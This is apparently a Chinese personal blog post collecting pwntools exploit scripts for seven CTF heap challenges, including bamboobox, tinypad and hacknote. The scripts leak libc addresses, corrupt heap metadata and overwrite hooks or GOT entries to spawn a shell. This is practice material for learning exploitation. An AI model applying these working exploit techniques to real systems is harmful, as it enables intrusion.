4.21之前做题杂记

Tags: Pwn

前几天的基础题都丢在这里了(也不一定是基础题, 做完没印象的也有):

bambobox:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./bamboobox')
sh=remote('127.0.0.1', 9997)
elf=ELF('./bamboobox')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#context.log_level='debug'

def Show():
    sh.recvuntil(':')
    sh.sendline('1')
    
def Add(size, content):
    sh.recvuntil(':')
    sh.sendline('2')
    sh.recvuntil(':')
    sh.sendline(str(size))
    sh.recvuntil(':')
    sh.send(content)

def Change(index, size, content):
    sh.recvuntil(':')
    sh.sendline('3')
    sh.recvuntil(':')
    sh.sendline(str(index))
    sh.recvuntil(':')
    sh.sendline(str(size))
    sh.recvuntil(':')
    sh.send(content)

def Remove(index):
    sh.recvuntil(':')
    sh.sendline('4')
    sh.recvuntil(':')
    sh.sendline(str(index))

def Exit():
    sh.recvuntil(':')
    sh.sendline('5')

Add(0x10, 'thu1e')
Add(0xa0, 'thu1e')
Add(0xa0, 'thu1e')
Add(0x10, 'thu1e')
chunk_ptr=0x06020d8
payload1=p64(0)*2+p64(chunk_ptr-0x18)+p64(chunk_ptr-0x10)+'a'*(0xa0-0x20)+p64(0xa0)+p64(0xb0)
Change(1, len(payload1), payload1)
Remove(2)
Add(0x140, 'a')
payload4=p64(0x10)+p64(0x6020e8)+p8(0xa0)
Change(1, len(payload4), payload4)

Show()
sh.recvuntil('0 : ')
leak_heap=u64(sh.recv(4).ljust(8, '\x00'))
heap_base=leak_heap-0x60
print 'leak base:'+hex(heap_base)
payload2=p64(0x10)+p64(elf.got['puts'])+p8(0xa0)
Change(1, len(payload2), payload2)
Show()
sh.recvuntil('0 : ')
leak_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=leak_addr-libc.sym['puts']
print 'leak addr:'+hex(leak_addr)
print 'libc base:'+hex(libc_base)
one_gadget=[0x45226, 0x4527a, 0xf0364, 0xf1207]
shell=one_gadget[0]+libc_base

payload3=p64(0x10)+p64(heap_base+0x30)+p64(0xa0)+p64(heap_base+0x50)+p64(0x140)+p64(heap_base+0x100)+p64(0x10)+p64(heap_base+0x1b0)
Change(1, len(payload3), payload3)
Change(3, 0x20, p64(0)*3+p64(0xffffffffffffffff))
malloc_size=-0x20-0x20-0xb0-0xb0-0x20-0x8-0xf
Add(malloc_size, '\x00')
Add(0x10, p64(shell)*2)
#Exit()
sh.interactive()

bjdctf_2020_YDSneedGrirlfriend:

这题写麻烦了

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./bjdctf_2020_YDSneedGrirlfriend')
sh=remote('node3.buuoj.cn',28720)
elf=ELF('./bjdctf_2020_YDSneedGrirlfriend')
libc=ELF('./libc-2.23.so')

def Add(size, content):
    sh.recvuntil('choice :')
    sh.sendline('1')
    sh.recvuntil('size is :')
    sh.sendline(str(size))
    sh.recvuntil('name is :')
    sh.send(content)

def Delete(index):
    sh.recvuntil('choice :')
    sh.sendline('2')
    sh.recvuntil('Index :')
    sh.sendline(str(index))

def Show(index):
    sh.recvuntil('choice :')
    sh.sendline('3')
    sh.recvuntil('Index :')
    sh.sendline(str(index))

Add(0x90, 'a')
Add(0x60, 'b')
Add(0x60, 'c')
Delete(0)
Add(0x90, 'w'*8)
Show(0)
sh.recvuntil('w'*8)
main_arena=u64(sh.recv(6).ljust(8, '\x00'))-88
libc_base=main_arena-0x4b20
log.success('libc base: '+hex(libc_base))
fake_chunk=main_arena-0x33
Delete(1)
Delete(2)
Delete(0)
Delete(1)
Add(0x60, p64(fake_chunk))
Add(0x60, 'a')
Add(0x60, '\x05')
#Add(0x60, p8(0)*3+p64(0)+p64(0x400B9C))
#sh.recv()
#sh.sendline('1')
payload=p8(0)*3+p64(0)*2+p64(0x400b9c)
Add(0x60, payload)
Delete(0)
sh.recvuntil('choice :')
sh.sendline('1')
#sh.recvuntil('size is :')
#sh.sendline(0x30)
sh.interactive()

ciscn_2019_s_6:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node3.buuoj.cn',27102)
libc=ELF('./libc-2.27.so')

def Add(size, name, call):
    sh.recvuntil('choice:')
    sh.sendline('1')
    sh.recvuntil('name\n')
    sh.sendline(str(size))
    sh.recvuntil('name:\n')
    sh.send(name)
    sh.recvuntil('call:\n')
    sh.send(call)

def Show(index):
    sh.recvuntil('choice:')
    sh.sendline('2')
    sh.recvuntil('index:\n')
    sh.sendline(str(index))

def Delete(index):
    sh.recvuntil('choice:')
    sh.sendline('3')
    sh.recvuntil('index:\n')
    sh.sendline(str(index))

onegadget=[0x4f2c5, 0x4f322, 0x10a38c]
Add(0x500, 'a', 'a')
Add(0x30, 'a', 'a')
Delete(0)
Show(0)
sh.recvuntil('name:\n')
leak_libc=u64(sh.recv(6).ljust(8, '\x00'))
main_arena=leak_libc-96
log.success('main_arena: '+hex(main_arena))
libc_base=main_arena-0x3ebc40
fake_chunk=libc_base+libc.sym['__free_hook']
Delete(1)
Delete(1)
Add(0x30, p64(fake_chunk), 'a')
Add(0x30, 'a', 'a')
Add(0x30, p64(libc_base+libc.sym['system']),'a')
Add(0x30, '/bin/sh\x00','a')
Delete(5)
sh.interactive()

oneshot_tjctf_2016:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./oneshot_tjctf_2016')
sh=remote('node3.buuoj.cn',28784)
elf=ELF('./oneshot_tjctf_2016')
libc=ELF('./libc-2.23.so')
context.log_level='debug'
sh.recvuntil('?\n')
sh.sendline(str(elf.got['puts']))
sh.recvuntil('Value: ')
#print sh.recvuntil('\n').split()[0]
puts_addr=int(sh.recvuntil('\n').split()[0], 16)
libc_base=puts_addr-libc.sym['puts']
sys_addr=libc_base+libc.sym['system']
bin_addr=libc_base+next(libc.search('/bin/sh\x00'))
onegadget=[0x45216, 0x4526a, 0xf02a4, 0xf1147]
payload=str(libc_base+onegadget[0])
sh.recv()
sh.sendline(payload)
sh.interactive()

wustctf2020_easyfast:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./wustctf2020_easyfast')
sh=remote('node3.buuoj.cn',26855)
elf=ELF('./wustctf2020_easyfast')
#context.log_level='debug'
sh.recvuntil('>\n')
sh.sendline('1')
sh.recvuntil('>\n')
sh.sendline(str(0x40))
sh.recvuntil('>\n')
sh.sendline('2')
sh.recvuntil('>\n')
sh.sendline('0')

sh.recvuntil('>\n')
sh.sendline('3')
sh.recvuntil('>\n')
sh.sendline('0')
sh.send(p64(0x0602080))

sh.recvuntil('>\n')
sh.sendline('1')
sh.recvuntil('>\n')
sh.sendline(str(0x40))
sh.recvuntil('>\n')
sh.sendline('1')
sh.recvuntil('>\n')
sh.sendline(str(0x40))
sh.recvuntil('>\n')
sh.sendline('3')
sh.recvuntil('>\n')
sh.sendline('2')
sh.send(p64(0))
sh.recvuntil('>\n')
sh.sendline('4')
sh.interactive()

tinypad:

有一个循环覆盖\x00蛮有意思的, 有点类似hitcon的child_tcache

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./tinypad')
elf=ELF('./tinypad')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level='debug'
main_arena_offset=0x3c4b20
def add(size, content):
    sh.recvuntil('(CMD)>>> ')
    sh.sendline('a')
    sh.recvuntil('(SIZE)>>> ')
    sh.sendline(str(size))
    sh.recvuntil('(CONTENT)>>> ')
    sh.sendline(content)

def edit(idx, content):
    sh.recvuntil('(CMD)>>> ')
    sh.sendline('e')
    sh.recvuntil('(INDEX)>>> ')
    sh.sendline(str(idx))
    sh.recvuntil('(CONTENT)>>> ')
    sh.sendline(content)
    sh.recvuntil('Is it OK?\n')
    sh.sendline('Y')

def delete(idx):
    sh.recvuntil('(CMD)>>> ')
    sh.sendline('d')
    sh.recvuntil('(INDEX)>>> ')
    sh.sendline(str(idx))

# 1. leak heap base
add(0x70, 'a' * 8)  # idx 0
add(0x70, 'b' * 8)  # idx 1
add(0x100, 'c' * 8)  # idx 2

delete(2)  # delete idx 1
delete(1)  # delete idx 0, idx 0 point to idx 1
sh.recvuntil(' # CONTENT: ')
data = sh.recvuntil('\n', drop=True)  # get pointer point to idx1
heap_base = u64(data.ljust(8, '\x00')) - 0x80
log.success('get heap base: ' + hex(heap_base))

# 2. leak libc base
# this will trigger malloc_consolidate
# first idx0 will go to unsorted bin
# second idx1 will merge with idx0(unlink), and point to idx0
# third idx1 will merge into top chunk
# but cause unlink feture, the idx0's fd and bk won't change
# so idx0 will leak the unsorted bin addr
delete(3)
sh.recvuntil(' # CONTENT: ')
data = sh.recvuntil('\n', drop=True)
unsorted_offset_arena = 8 + 10 * 8
main_arena = u64(data.ljust(8, '\x00')) - unsorted_offset_arena
libc_base = main_arena - main_arena_offset
log.success('main arena addr: ' + hex(main_arena))
log.success('libc base addr: ' + hex(libc_base))

# 3. house of einherjar
add(0x18, 'a' * 0x18)  # idx 0
# we would like trigger house of einherjar at idx 1
add(0xf8, 'b' * 0xf8)  # idx 1
add(0x100, 'c' * 0xa0)  # idx 2

fake_chunk_addr=0x602060
einh_chunk_addr=heap_base+0x20
fake_chunk_offset=einh_chunk_addr-fake_chunk_addr
num_of_zero=len(p64(fake_chunk_offset))-len(p64(fake_chunk_offset).strip('\x00'))
for i in range(num_of_zero+1):
    payload='a'*0x10
    payload+=p64(fake_chunk_offset).strip('\x00')+'a'*(num_of_zero-i)
    edit(1, payload)
#Edit(1, )
payload='f'*0x28+p64(0x101)+p64(0x602060)*2
edit(3, payload)
delete(2)
#print str(proc.pidof(sh))

payload='d'*0x28+p64(0x101)
#payload='\x11'
edit(3, payload)
payload='f'*0xd0+'a'*8+p64(libc_base+libc.sym['__environ'])+'b'*8+p64(0x602148)#.strip('\x00')
add(0xf0, payload)
sh.recvuntil('CONTENT: ')
environ_addr=u64(sh.recv(6).ljust(8, '\x00'))
log.success('environ addr: '+hex(environ_addr))
ret_addr=environ_addr-0xf0
#delete(2)
log.success('ret addr: '+hex(ret_addr))
edit(2, p64(ret_addr))
oengadget=[0x45226,0x4527a,0xf0364,0xf1207]
edit(1, p64(libc_base+oengadget[0]))
#edit(3, payload)
#Delete(3)
sh.recv()
sh.sendline('q')
sh.interactive()

hacknote:

wiki上给的和buu上的不一致, 搞得我浪费俩小时, 我真是铁猪鼻

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./hacknote')
sh=remote('node3.buuoj.cn',26556)
elf=ELF('./hacknote')
libc=ELF('./libc_32.so.6')

def Add(size, content):
    sh.recvuntil(':')
    sh.sendline('1')
    sh.recvuntil(':')
    sh.sendline(str(size))
    sh.recvuntil(':')
    sh.send(content)

def Delete(index):
    sh.recvuntil(':')
    sh.sendline('2')
    sh.recvuntil(':')
    sh.sendline(str(index))

def Print(index):
    sh.recvuntil(':')
    sh.sendline('3')
    sh.recvuntil(':')
    sh.sendline(str(index))

Add(16, 'a')
Add(16, 'a')
Delete(0)
Delete(1)
Add(8, p32(0x804862b)+p32(elf.got['puts']))
print str(proc.pidof(sh))
#pause()
Print(0)
puts_addr=u32(sh.recv(4))
libc_base=puts_addr-libc.sym['puts']
sys_addr=libc_base+libc.sym['system']
print hex(puts_addr)
print hex(libc_base)
print hex(sys_addr)

Delete(2)
Add(8, p32(sys_addr)+';sh\x00')
Print(0)
#print str(proc.pidof(sh))
#pause()
sh.interactive()

4 21之前做题杂记

4.21之前做题杂记

bambobox:

bjdctf_2020_YDSneedGrirlfriend:

ciscn_2019_s_6:

oneshot_tjctf_2016:

wustctf2020_easyfast:

tinypad:

hacknote:

猜你喜欢